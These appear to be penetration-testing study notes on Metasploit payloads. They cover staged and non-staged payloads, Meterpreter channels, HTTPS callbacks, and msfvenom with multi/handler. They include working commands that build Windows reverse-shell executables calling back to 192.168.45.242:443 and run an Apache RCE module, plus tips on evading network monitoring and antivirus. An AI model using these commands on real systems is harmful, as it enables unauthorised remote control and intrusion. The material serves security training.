Payloads

Staged vs Non-Staged

• Non-Staged Payload: Sends the full exploit and shellcode together; more stable but larger in size. E.g. payload/linux/x64/shell_reverse_tcp.

• Staged Payload: A two-step process. A small stager is first delivered, which then connects to the attacker's machine to fetch the rest of the payload. They have a / in the payload name, e.g. shell/reverse_tcp.

Staged payloads are useful when space is limited or for evading detection but creates extra network traffic. First, a small initial program (the stager) runs on the target machine. Its job is to reach back to your attacker machine and download the malicious part of the payload (the stage) over the network which is then retrieved and injected directly into the victim machine's memory.

Meterpreter

Meterpreter is a powerful, flexible payload that runs entirely in memory, leaving fewer traces and offering encrypted communication, file transfers, and system management tools. It enables advanced post-exploitation actions.

# Set Meterpreter payload
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload 13
payload => linux/x64/meterpreter_reverse_tcp

# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run

# Example Meterpreter commands
meterpreter > sysinfo
meterpreter > getuid

Commands with the l prefix operate locally, i.e., on our attacker machine.

meterpreter > help

...
Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
...
    lls                       List local files
    ls                        List files
...

Channels

Meterpreter allows the creation of multiple command shells (channels).

# create a new channel
meterpreter > shell
Process 135 created.
Channel 1 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 1? [y/N]  y

# create a second channel
meterpreter > shell
Process 137 created.
Channel 2 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 2? [y/N]  y

# list all active channels
meterpreter > channel -l

    Id  Class  Type
    --  -----  ----
    1   3      stdapi_process
    2   3      stdapi_process

HTTPS

HTTPS Meterpreter payloads use encrypted web traffic for communication. When the infected target connects back to the attacker's machine, it does so over HTTPS, making the traffic look like regular web activity. Security tools monitoring the network only see harmless-looking encrypted requests, not the actual malicious instructions inside. If a defender inspects the callback URL directly in a browser, they’ll just see a generic 404 error, not the payload or its commands. However, Meterpreter is well-known and can be detected by antivirus systems. A common strategy is to use a simple shell to gain initial access, then deploy Meterpreter after evading detection.

# Example HTTPS Meterpreter payload
payload/linux/x64/meterpreter_reverse_https

msfvenom

msfvenom is used to generate payloads in various formats. These payloads initiate a reverse connection to the attacker's machine, allowing remote control.

# List available payloads for Windows x64
$ msfvenom -l payloads --platform windows --arch x64

# Generate non-staged payload (Windows)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o nonstaged.exe

# Generate staged payload (Windows)
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o staged.exe

Staged payloads need a Metasploit handler (multi/handler) since tools like nc cannot handle them.

nc will be to catch them, but we won't be able to send any commands through them.

# Start multi/handler for staged payloads
msf6 exploit(multi/http/apache_normalize_path_rce) > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 192.168.45.242
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > run